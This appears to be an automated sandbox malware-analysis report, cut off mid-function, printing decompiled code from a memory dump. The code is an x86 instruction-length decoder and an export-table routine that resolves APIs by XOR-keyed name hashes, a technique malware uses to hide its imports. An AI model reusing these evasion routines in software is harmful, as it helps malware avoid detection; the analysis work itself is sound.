0x00000000
0x6e9e85cf
0x6e9e84fe
0x6e9e84fe
0x6e9e8500
0x6e9e850c
0x6e9e8513
0x6e9e8515
0x00000000
0x00000000
0x6e9e8521
0x6e9e8522
0x6e9e8524
0x00000000
0x00000000
0x00000000
0x6e9e8524
0x6e9e8517
0x6e9e851a
0x00000000
0x00000000
0x6e9e85d0
0x6e9e85d4
0x6e9e85d5
0x6e9e85d5
0x00000000
0x6e9e84dd
0x6e9e84d5

Strings

, xrefs: 6E9E8A5E

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 887c76f87bbc27c21a0e4e06ab69dcb1896b64349bb8a5a860253b88d9d2ec0d
Instruction ID: 447bdd94be4ac89695bd1b7ae3c7eb45c00e1e59784bf7a486942af500b2a989
Opcode Fuzzy Hash: 887c76f87bbc27c21a0e4e06ab69dcb1896b64349bb8a5a860253b88d9d2ec0d
Instruction Fuzzy Hash: AC124E712083049FC726DFA4D994AAE77A9AFD570CF244D2DE699876A0EB30DC05CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F9348, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E9F9348(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E9F3670( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6e9f934f
0x6e9f9353
0x6e9f935f
0x6e9f9363
0x6e9f9367
0x6e9f936c
0x6e9f936f
0x6e9f9371
0x6e9f9373
0x6e9f9373
0x6e9f9376
0x6e9f937c
0x6e9f93f4
0x6e9f93f8
0x6e9f93fb
0x6e9f93fb
0x6e9f93fe
0x00000000
0x6e9f93fe
0x6e9f9383
0x6e9f93eb
0x6e9f93ef
0x00000000
0x6e9f93ef
0x6e9f938a
0x6e9f93e3
0x6e9f93e6
0x00000000
0x6e9f93e6
0x6e9f938f
0x6e9f93cd
0x6e9f93d4
0x6e9f93d7
0x6e9f93a0
0x6e9f93a0
0x6e9f93a6
0x00000000
0x00000000
0x6e9f93ab
0x6e9f93c5
0x6e9f93c8
0x00000000
0x6e9f93c8
0x6e9f93b0
0x00000000
0x6e9f93b2
0x6e9f93b6
0x6e9f93b9
0x00000000
0x6e9f93b9
0x6e9f93b0
0x6e9f9401
0x6e9f9401
0x6e9f9401
0x6e9f940a
0x6e9f9413
0x6e9f9416
0x6e9f9419
0x6e9f941c
0x6e9f941f
0x6e9f9425
0x6e9f9467
0x6e9f946a
0x6e9f946b
0x6e9f9472
0x6e9f9475
0x6e9f9427
0x6e9f942b
0x6e9f9435
0x6e9f943c
0x6e9f943e
0x6e9f9457
0x6e9f945a
0x6e9f945a
0x6e9f943c
0x6e9f947d
0x6e9f9480
0x6e9f9483
0x6e9f9487
0x6e9f948b
0x6e9f9495
0x6e9f9499
0x6e9f94a3
0x6e9f94ac
0x6e9f94b9
0x6e9f94bc
0x6e9f94bf
0x6e9f94bf
0x6e9f94cb
0x6e9f94d6
0x6e9f94dc
0x6e9f94e0
0x6e9f94cd
0x6e9f94cd
0x6e9f94cd
0x6e9f94e8
0x6e9f9512
0x6e9f9518
0x6e9f9518
0x6e9f9520
0x6e9f98c9
0x6e9f98cf
0x6e9f98d5
0x6e9f98d5
0x00000000
0x6e9f9526
0x6e9f9526
0x6e9f952a
0x6e9f952d
0x6e9f9530
0x6e9f9533
0x6e9f9537
0x6e9f9539
0x6e9f953c
0x6e9f953f
0x6e9f9543
0x6e9f9548
0x6e9f954b
0x6e9f954f
0x6e9f9554
0x6e9f9557
0x6e9f9559
0x6e9f955c
0x6e9f9560
0x6e9f9565
0x6e9f9575
0x6e9f957b
0x6e9f957b
0x6e9f9583
0x6e9f9585
0x6e9f958e
0x6e9f9590
0x6e9f9593
0x6e9f959e
0x6e9f95cb
0x6e9f95a0
0x6e9f95b7
0x6e9f95b7
0x6e9f95d3
0x6e9f95d9
0x6e9f95df
0x6e9f95df
0x6e9f95d3
0x6e9f958e
0x6e9f95e6
0x6e9f9657
0x6e9f965c
0x6e9f96b5
0x6e9f9777
0x6e9f977c
0x6e9f978b
0x6e9f9791
0x6e9f9795
0x6e9f979e
0x6e9f97a5
0x6e9f97ae
0x6e9f97bc
0x6e9f97bf
0x6e9f97a7
0x6e9f97a7
0x6e9f97a7
0x6e9f97a5
0x6e9f97c8
0x6e9f97f5
0x6e9f9808
0x6e9f9810
0x6e9f97f7
0x6e9f97f9
0x6e9f9801
0x6e9f9801
0x6e9f97ca
0x6e9f97cf
0x6e9f97ee
0x6e9f97d1
0x6e9f97d6
0x6e9f97e7
0x6e9f97d8
0x6e9f97d8
0x6e9f97d8
0x6e9f97d6
0x6e9f97cf
0x6e9f9818
0x6e9f9827
0x6e9f9834
0x6e9f983d
0x6e9f9841
0x6e9f9845
0x6e9f9848
0x6e9f984b
0x6e9f984e
0x6e9f9851
0x6e9f9854
0x6e9f985a
0x6e9f985e
0x6e9f9864
0x6e9f9864
0x6e9f985a
0x6e9f986a
0x6e9f98a7
0x6e9f98ab
0x6e9f98b2
0x6e9f98b8
0x6e9f986c
0x6e9f986f
0x6e9f988f
0x6e9f9893
0x6e9f989a
0x6e9f98a1
0x6e9f9871
0x6e9f9874
0x6e9f9876
0x6e9f987a
0x6e9f9884
0x6e9f988a
0x6e9f988a
0x6e9f9874
0x6e9f986f
0x6e9f98bf
0x6e9f98bf
0x6e9f98d8
0x6e9f98d8
0x6e9f98de
0x6e9f98e3
0x6e9f993d
0x6e9f9942
0x6e9f9981
0x6e9f9986
0x6e9f9988
0x6e9f998c
0x6e9f998f
0x6e9f9992
0x6e9f9994
0x6e9f9995
0x6e9f9995
0x6e9f999a
0x6e9f99b8
0x6e9f99ba
0x6e9f99be
0x6e9f99c4
0x6e9f99c7
0x6e9f99c9
0x6e9f99ca
0x6e9f99ca
0x00000000
0x6e9f999c
0x6e9f999c
0x6e9f999c
0x6e9f99a0
0x6e9f99a6
0x6e9f99a9
0x6e9f99ab
0x6e9f99ae
0x6e9f99cd
0x6e9f99cd
0x6e9f99d4
0x6e9f99ee
0x6e9f99d6
0x6e9f99d6
0x6e9f99e2
0x6e9f99e3
0x6e9f99e6
0x6e9f99e6
0x6e9f99fc
0x6e9f99fc
0x6e9f999a
0x6e9f9947
0x6e9f9955
0x6e9f996d
0x6e9f9971
0x6e9f9974
0x6e9f997a
0x6e9f997e
0x6e9f997e
0x00000000
0x6e9f997e
0x6e9f9957
0x6e9f995b
0x6e9f9961
0x6e9f9961
0x6e9f9967
0x00000000
0x6e9f9967
0x6e9f9949
0x6e9f994d
0x00000000
0x6e9f994d
0x6e9f98e7
0x6e9f9913
0x6e9f992b
0x6e9f992f
0x6e9f9932
0x6e9f9935
0x6e9f9937
0x6e9f993a
0x6e9f9915
0x6e9f9915
0x6e9f9919
0x6e9f991c
0x6e9f991f
0x6e9f9922
0x6e9f9925
0x6e9f9925
0x00000000
0x6e9f9913
0x6e9f98ed
0x00000000
0x00000000
0x6e9f98f3
0x6e9f98f7
0x6e9f98fd
0x6e9f9900
0x6e9f9903
0x6e9f9906
0x00000000
0x6e9f9906
0x6e9f977e
0x6e9f9782
0x6e9f9788
0x00000000
0x6e9f9788
0x6e9f96c0
0x6e9f96d2
0x6e9f96d7
0x6e9f9742
0x00000000
0x00000000
0x6e9f9749
0x6e9f976f
0x6e9f9773
0x00000000
0x00000000
0x6e9f9752
0x6e9f9757
0x6e9f976b
0x00000000
0x00000000
0x00000000
0x6e9f976d
0x6e9f975e
0x00000000
0x00000000
0x6e9f9763
0x00000000
0x00000000
0x6e9f9765
0x00000000
0x6e9f9749
0x6e9f96d9
0x6e9f96e3
0x6e9f96f4
0x6e9f96f7
0x6e9f96fa
0x6e9f9700
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9f9706
0x6e9f9706
0x6e9f9706
0x6e9f970d
0x00000000
0x00000000
0x6e9f970f
0x6e9f9712
0x6e9f9718
0x00000000
0x00000000
0x00000000
0x6e9f971a
0x6e9f971c
0x6e9f9725
0x00000000
0x00000000
0x6e9f9739
0x00000000
0x00000000
0x00000000
0x6e9f973b
0x6e9f96c7
0x00000000
0x00000000
0x00000000
0x6e9f96cd
0x6e9f9661
0x6e9f9690
0x6e9f9691
0x6e9f969a
0x00000000
0x6e9f96ab
0x00000000
0x6e9f96ab
0x6e9f9668
0x6e9f966b
0x6e9f967e
0x6e9f967f
0x6e9f9683
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9f966b
0x6e9f9661
0x6e9f95ed
0x6e9f964a
0x6e9f964e
0x6e9f9654
0x00000000
0x6e9f9654
0x6e9f95ef
0x6e9f95f3
0x6e9f9600
0x6e9f9604
0x6e9f961a
0x6e9f9622
0x6e9f9606
0x6e9f9608
0x6e9f9612
0x6e9f9612
0x6e9f9628
0x6e9f9631
0x6e9f9648
0x00000000
0x00000000
0x00000000
0x6e9f9648
0x6e9f9633
0x6e9f9633
0x00000000
0x6e9f9628

Strings

, xrefs: 6E9F99B3

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction ID: 7390574d0f3c80789687e5cdce67ef2a754945a19002bc9aecdb5a46680bfa15
Opcode Fuzzy Hash: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction Fuzzy Hash: 94227C3080839ACBD715CFD5C4A136ABBE4BF86304F14886EE9E54B295D335D986CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F1460, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E9F1460(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E9F0328(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e9fd208 == 0 ||  *0x6e9fd2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x7af3da47;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E9F4FD4( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e9fd2ec |  *0x6e9fd2ed;
									if(( *0x6e9fd2ec |  *0x6e9fd2ed) == 0) {
										_t525 =  *0x6e9fd208; // 0x46505a8
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e9fd2ec = 1;
											_t526 = E6E9F35F4(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E9F1C54(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e9fd208 = _t526;
											 *0x6e9fd2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E9F35F4(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E9F1C54(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E9EDFF8(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E9EDFF8(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t208 = _t525 + 0x1c0; // 0x465b878
										_t257 =  *_t208;
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x82fffbdc;
									if(_t535[0x54] == 0x82fffbdc) {
										 *0x6e9fd20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0xdb278333;
										if(_t535[0x54] == 0xdb278333) {
											 *0x6e9fd210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E9EE8D4( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
